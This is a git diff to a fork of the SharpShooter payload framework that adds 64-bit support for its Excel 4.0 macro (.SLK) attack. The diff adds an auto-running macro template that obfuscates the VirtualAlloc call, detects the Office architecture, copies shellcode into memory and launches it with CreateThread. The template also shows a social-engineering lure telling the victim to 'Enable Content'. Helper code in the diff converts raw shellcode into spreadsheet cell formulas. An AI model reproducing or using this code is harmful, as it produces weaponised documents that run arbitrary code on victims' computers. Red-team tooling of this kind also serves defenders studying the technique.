diff --git a/Readme.md b/Readme.md
index e5460a0..452ab0c 100644
--- a/Readme.md
+++ b/Readme.md
@@ -10,6 +10,7 @@
 
 Description
 ===========
+====SharpShooter fork to add compatibility for 64-bit processes for the .SLK Macros 4.0 attack.====
 
 SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code.
 SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's [DotNetToJavaScript](https://github.com/tyranid/DotNetToJScript) tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.
@@ -160,4 +161,4 @@ Credits:
 - [@buffaloverflow](https://twitter.com/buffaloverflow): Rich Warren for Demiguise
 - [@arvanaghi](https://twitter.com/arvanaghi) and [@ChrisTruncer](https://twitter.com/ChrisTruncer): Brandon Arvanaghi and Chris Truncer for CheckPlease
 - [@subTee](https://twitter.com/subtee): Documentation for Squiblydoo and Squiblytwo techniques
-- [@StanHacked](https://twitter.com/stanhacked): Excel 4.0 technique and code examples
\ No newline at end of file
+- [@StanHacked](https://twitter.com/stanhacked): Excel 4.0 technique and code examples
diff --git a/SharpShooter.py b/SharpShooter.py
index 9b10de1..8243d04 100644
--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -64,6 +64,7 @@ def validate_args(self):
         parser.add_argument("--amsi", metavar="<amsi>", dest="amsi", default=None, help="Use amsi bypass technique: amsienable")
         parser.add_argument("--delivery", metavar="<type>", dest="delivery", default=None, help="Delivery method: web, dns, both")
         parser.add_argument("--rawscfile", metavar="<path>", dest="rawscfile", default=None, help="Path to raw shellcode file for stageless payloads")
+        parser.add_argument("--rawscfile64", metavar="<path>", dest="rawscfile64", default=None, help="Path to raw shellcode file for stageless payloads. [64bit shellcode]")
         parser.add_argument("--shellcode", action='store_true', help="Use built in shellcode execution")
         parser.add_argument("--scfile", metavar="<path>", dest="shellcode_file", default=None, help="Path to shellcode file as CSharp byte array")
         parser.add_argument("--refs", metavar="<refs>", dest="refs", default=None, help="References required to compile custom CSharp,\ne.g. mscorlib.dll,System.Windows.Forms.dll")
@@ -559,8 +560,7 @@ def run(self, args):
             f.write(macro_stager)
 
         if(payload_type == 9):
-            payload = excel4.generate_slk(args.rawscfile)
-        
+            payload = excel4.generate_slk(args.rawscfile, args.rawscfile64)
         if(args.comtechnique):
             if not args.awltechnique or args.awltechnique == "wmic":
                 payload_file = "output/" + outputfile + ".xsl"
diff --git a/modules/excel4.py b/modules/excel4.py
index 7982917..2ed1044 100644
--- a/modules/excel4.py
+++ b/modules/excel4.py
@@ -10,27 +10,62 @@ def bytes2int(str):
 
 SHELLCODE_HEADER = """ID;P
 O;E
-NN;NAuto_open;ER1C1;KSpreadsheet;F
-C;X1;Y1;K0;ER1C2()
-C;X1;Y2;K0;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
-C;X1;Y3;K0;ESELECT(R1C2:R1000:C2,R1C2)
-C;X1;Y4;K0;ESET.VALUE(R1C3, 0)
-C;X1;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
-C;X1;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
-C;X1;Y7;K0;ESET.VALUE(R1C3, R1C3 + 1)
-C;X1;Y8;K0;ESELECT(, "R[1]C")
-C;X1;Y9;K0;ENEXT()
-C;X1;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
-C;X1;Y11;K0;EHALT()
+NN;NAuto_open;ER5C102;KSpreadsheet;F
+C;X1;Y1;K"Enable Content to update file encoding."
+C;X102;Y1;K"Vir"
+C;X102;Y2;K"tual"
+C;X102;Y3;K"All"
+C;X102;Y4;K"oc"
+C;X102;Y5;K0;ECONCATENATE(R1C102,R2C102,R3C102,R4C102)
+C;X102;Y6;K0;ER1C103()
+C;X103;Y1;K0;EERROR(FALSE, R2C103:R3C103)
+C;X103;Y2;K""C:\\Program Files (x86)\\Microsoft Office\\root""
+C;X103;Y3;K0;EDIRECTORY(R2C103)
+C;X103;Y4;K0;EIF(ISERROR(R3C103), R1C100(), R1C104())
+C;X104;Y1;K0;ER1C105()
+C;X104;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",0,%s,4096,64)
+C;X104;Y3;K0;ESELECT(R1C105:R1000:C105,R1C105)
+C;X104;Y4;K0;ESET.VALUE(R1C99, 0)
+C;X104;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
+C;X104;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C104 + R1C99 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
+C;X104;Y7;K0;ESET.VALUE(R1C99, R1C99 + 1)
+C;X104;Y8;K0;ESELECT(, "R[1]C")
+C;X104;Y9;K0;ENEXT()
+C;X104;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C104, 0, 0, 0)
+C;X104;Y11;K0;ER11C100()
+C;X100;Y1;K0;ER1C101()
+C;X100;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",1342177280,%s,12288,64)
+C;X100;Y3;K0;ESELECT(R1C101:R1000:C101,R1C101)
+C;X100;Y4;K0;ESET.VALUE(R1C99, 0)
+C;X100;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
+C;X100;Y6;K0;ECALL("kernel32", "RtlCopyMemory", "JJCJ",R2C100 + R1C99 * 20,ACTIVE.CELL(),LEN(ACTIVE.CELL()))
+C;X100;Y7;K0;ESET.VALUE(R1C99, R1C99 + 1)
+C;X100;Y8;K0;ESELECT(, "R[1]C")
+C;X100;Y9;K0;ENEXT()
+C;X100;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C100, 0, 0, 0)
+C;X100;Y11;K0;ESELECT(R1C1, R1C1)
+C;X100;Y12;K0;ESET.VALUE(R1C1, "AAAAAAA")
+C;X100;Y13;K0;ESET.VALUE(R2C1, "BBBBBBB")
+C;X100;Y14;K0;ESET.VALUE(R3C1, "CCCCCCC")
+C;X100;Y15;K0;ESET.VALUE(R4C1, "DDDDDDD")
+C;X100;Y16;K0;ESET.VALUE(R5C1, "EEEEEEE")
+C;X100;Y17;K0;ESET.VALUE(R6C1, "FFFFFFF")
+C;X100;Y28;K0;EHALT()
 """
 
-def generate_slk(shellcode_path):
-	return build_shellcode_slk(shellcode_path)
+def generate_slk(shellcode_path, shellcode_path64):
+	return build_shellcode_slk(shellcode_path, shellcode_path64)
 
-def build_shellcode_slk(shellcode_path):
+def build_shellcode_slk(shellcode_path, shellcode_path64):
 	#print("[*] Building shellcode exec SLK")
+	slk_shellcode_32, size32 = build_shellcode_arch(shellcode_path, 105)
+	slk_shellcode_64, size64 = build_shellcode_arch(shellcode_path64, 101)
+	slk_output = SHELLCODE_HEADER % (size32, size64)
+	slk_output+= slk_shellcode_32 + slk_shellcode_64 + "\nE"
+	return slk_output
 
-	slk_output = SHELLCODE_HEADER
+def build_shellcode_arch(shellcode_path, raw):
+	output = ""
 	with open(shellcode_path, "rb") as f:
 	    byte = f.read(1)
 	    i = 0
@@ -38,15 +73,15 @@ def build_shellcode_slk(shellcode_path):
 	    while byte != "":
 		if i == 0:
 			cell=cell+1
-			slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
+			output+=("C;X%s;Y%s;K0;E" % (raw, str(cell)))
 		else:
-			slk_output+=("&")
-		slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
+			output+=("&")
+		output+=("CHAR(" + str(bytes2int(byte)) + ")")
 	        byte = f.read(1)
 		i+=1
 		if i == 20:
-			slk_output+=("\n")
+			output+=("\n")
 			i = 0
 	cell=cell+1
-	slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
-	return slk_output
\ No newline at end of file
+	output+=("\nC;X%s;Y%s;K0;ERETURN()\n" % (raw, str(cell)))
+	return output, cell * 20